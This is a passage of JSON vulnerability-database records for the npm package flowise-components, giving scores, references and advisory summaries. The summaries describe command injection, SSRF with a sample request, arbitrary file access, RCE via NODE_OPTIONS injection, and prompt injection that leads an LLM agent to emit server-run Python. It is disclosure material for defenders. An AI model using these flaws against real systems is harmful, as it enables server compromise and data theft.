v4"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4","reference_id":"GHSA-2x8m-83vc-6wv4","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:18:28Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41272","GHSA-2x8m-83vc-6wv4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e65e-s5sd-kuhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84126?format=json","vulnerability_id":"VCID-fu6t-9dk4-jbh9","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization from the “Custom MCP” configuration in http://localhost:3000/canvas - where any user can add a new MCP, when doing so - adding a new MCP using stdio, the user can add any command, even though your code have input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess, and a list of predefined specific safe commands - these commands, for example \"npx\" can be combined with code execution arguments (\"-c touch /tmp/pwn\") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40933","reference_id":"","reference_type":"","scores":[{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22424","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22614","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22634","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22621","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40933"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40933","reference_id":"CVE-2026-40933","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40933"},{"reference_url":"https://github.com/advisories/GHSA-c9gw-hvqq-f33r","reference_id":"GHSA-c9gw-hvqq-f33r","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c9gw-hvqq-f33r"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r","reference_id":"GHSA-c9gw-hvqq-f33r","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r"},{"reference_url":"https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem","reference_id":"mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/"}],"url":"https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem"},{"reference_url":"https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp","reference_id":"the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/"}],"url":"https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-40933","GHSA-c9gw-hvqq-f33r"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fu6t-9dk4-jbh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359950?format=json","vulnerability_id":"VCID-gvpx-4wkw-43cz","summary":"Flowise Execute Flow function has an SSRF vulnerability\n### Summary\n\nThe attacker provides an intranet address through the base url field configured in the Execute Flow node \n→ Bypass checkDenyList / resolveAndValidate in httpSecurity.ts (not called)\n→ Causes the server to initiate an HTTP request to any internal network address, read cloud metadata, or detect internal network services \n\n### Details\n\n<img width=\"1280\" height=\"860\" alt=\"9a52a74e6fe2fd78e4962d1d68057fc2\" src=\"https://github.com/user-attachments/assets/20df0006-9129-4886-8928-16d19a617c23\" />\n\nThen initiate the call: \n\n```\nPOST /api/v1/prediction/d6739838-d3b3-43d9-86ff-911a3d757a7e HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nAuthorization: Bearer apikey\nContent-Length: 17\n\n{\"question\": \"1\"}\n```\n\nServer received a request:\n\n<img width=\"1432\" height=\"172\" alt=\"f45c757fec408e13739db068252ff21b\" src=\"https://github.com/user-attachments/assets/d3dfe0f5-83ec-4c79-ab32-754382a68d5f\" />\n\nAnd there is an echo: \n\n<img width=\"1280\" height=\"666\" alt=\"fa0caf0deb306cfeeea8fdf8941a287e\" src=\"https://github.com/user-attachments/assets/55a94d25-120b-4e9c-9517-46c2fc2b667f\" />\n\nFix:\nCall secureFetch for verification\n\n\n\n### Impact\n\nThis is a Server-Side Request Forgery (SSRF) vulnerability that may lead to the following risks: \n- Explore Internal Web Applications\n- Access sensitive management interfaces\n- Leak internal configuration, credentials, or confidential information\n\nThis vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in enterprise environments.","references":[{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2"},{"reference_url":"https://github.com/advisories/GHSA-9hrv-gvrv-6gf2","reference_id":"GHSA-9hrv-gvrv-6gf2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9hrv-gvrv-6gf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["GHSA-9hrv-gvrv-6gf2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gvpx-4wkw-43cz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/81063?format=json","vulnerability_id":"VCID-hkfs-v3bp-kbh5","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41265","reference_id":"","reference_type":"","scores":[{"value":"0.0033","scoring_system":"epss","scoring_elements":"0.56461","published_at":"2026-06-13T12:55:00Z"},{"value":"0.0033","scoring_system":"epss","scoring_elements":"0.5645","published_at":"2026-06-14T12:55:00Z"},{"value":"0.0033","scoring_system":"epss","scoring_elements":"0.56326","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0033","scoring_system":"epss","scoring_elements":"0.56446","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41265"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41265","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41265"},{"reference_url":"https://github.com/advisories/GHSA-v38x-c887-992f","reference_id":"GHSA-v38x-c887-992f","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v38x-c887-992f"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f","reference_id":"GHSA-v38x-c887-992f","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:16:20Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41265","GHSA-v38x-c887-992f"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hkfs-v3bp-kbh5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80659?format=json","vulnerability_id":"VCID-j5hh-haj2-qydg","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41137","reference_id":"","reference_type":"","scores":[{"value":"0.00422","scoring_system":"epss","scoring_elements":"0.62631","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00422","scoring_system":"epss","scoring_elements":"0.62626","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00422","scoring_system":"epss","scoring_elements":"0.62518","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00422","scoring_system":"epss","scoring_elements":"0.62619","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41137"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41137","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41137"},{"reference_url":"https://github.com/advisories/GHSA-9wc7-mj3f-74xv","reference_id":"GHSA-9wc7-mj3f-74xv","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9wc7-mj3f-74xv"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv","reference_id":"GHSA-9wc7-mj3f-74xv","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:20:09Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41137","GHSA-9wc7-mj3f-74xv"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j5hh-haj2-qydg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/212288?format=json","vulnerability_id":"VCID-jmps-anck-eqdt","summary":"Flowise is vulnerable to arbitrary file exposure through its ReadFileTool","references":[{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-61913","reference_id":"CVE-2025-61913","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-61913"},{"reference_url":"https://github.com/advisories/GHSA-j44m-5v8f-gc9c","reference_id":"GHSA-j44m-5v8f-gc9c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j44m-5v8f-gc9c"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c","reference_id":"GHSA-j44m-5v8f-gc9c","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj","reference_id":"GHSA-jv9m-vf54-chjj","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34146?format=json","purl":"pkg:npm/flowise-components@3.0.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.0.8"}],"aliases":["GHSA-j44m-5v8f-gc9c"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jmps-anck-eqdt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/81102?format=json","vulnerability_id":"VCID-pzza-9xq9-a7de","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise is vulnerable to a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass using the FILE-STORAGE:: keyword combined with a NODE_OPTIONS environment variable injection. This allows for the execution of arbitrary system commands with root privileges within the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41268","reference_id":"","reference_type":"","scores":[{"value":"0.0139","scoring_system":"epss","scoring_elements":"0.80839","published_at":"2026-06-14T12:55:00Z"},{"value":"0.0139","scoring_system":"epss","scoring_elements":"0.80777","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0139","scoring_system":"epss","scoring_elements":"0.80848","published_at":"2026-06-13T12:55:00Z"},{"value":"0.0139","scoring_system":"epss","scoring_elements":"0.80837","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41268"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41268","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41268"},{"reference_url":"https://github.com/advisories/GHSA-cvrr-qhgw-2mm6","reference_id":"GHSA-cvrr-qhgw-2mm6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cvrr-qhgw-2mm6"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6","reference_id":"GHSA-cvrr-qhgw-2mm6","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:19:30Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41268","GHSA-cvrr-qhgw-2mm6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pzza-9xq9-a7de"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/128052?format=json","vulnerability_id":"VCID-qgs1-hazv-67b8","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to exploit this vulnerability to read and write arbitrary files to any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-61913","reference_id":"","reference_type":"","scores":[{"value":"0.01058","scoring_system":"epss","scoring_elements":"0.78099","published_at":"2026-06-12T12:55:00Z"},{"value":"0.01058","scoring_system":"epss","scoring_elements":"0.78031","published_at":"2026-06-11T12:55:00Z"},{"value":"0.01159","scoring_system":"epss","scoring_elements":"0.7907","published_at":"2026-06-14T12:55:00Z"},{"value":"0.01159","scoring_system":"epss","scoring_elements":"0.79073","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-61913"},{"reference_url":"https://github.com/FlowiseAI/Flowise/pull/5275","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/pull/5275"},{"reference_url":"https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3","reference_id":"1fb12cd93143592a18995f63b781d25b354d48a3","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"}],"url":"https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-61913","reference_id":"CVE-2025-61913","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-61913"},{"reference_url":"https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8","reference_id":"flowise%403.0.8","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"}],"url":"https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c","reference_id":"GHSA-j44m-5v8f-gc9c","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c"},{"reference_url":"https://github.com/advisories/GHSA-jv9m-vf54-chjj","reference_id":"GHSA-jv9m-vf54-chjj","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jv9m-vf54-chjj"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj","reference_id":"GHSA-jv9m-vf54-chjj","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34146?format=json","purl":"pkg:npm/flowise-components@3.0.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.0.8"}],"aliases":["CVE-2025-61913","GHSA-jv9m-vf54-chjj"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qgs1-hazv-67b8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80885?format=json","vulnerability_id":"VCID-rgmv-6bqh-eqf2","summary":"Flowise is a drag & 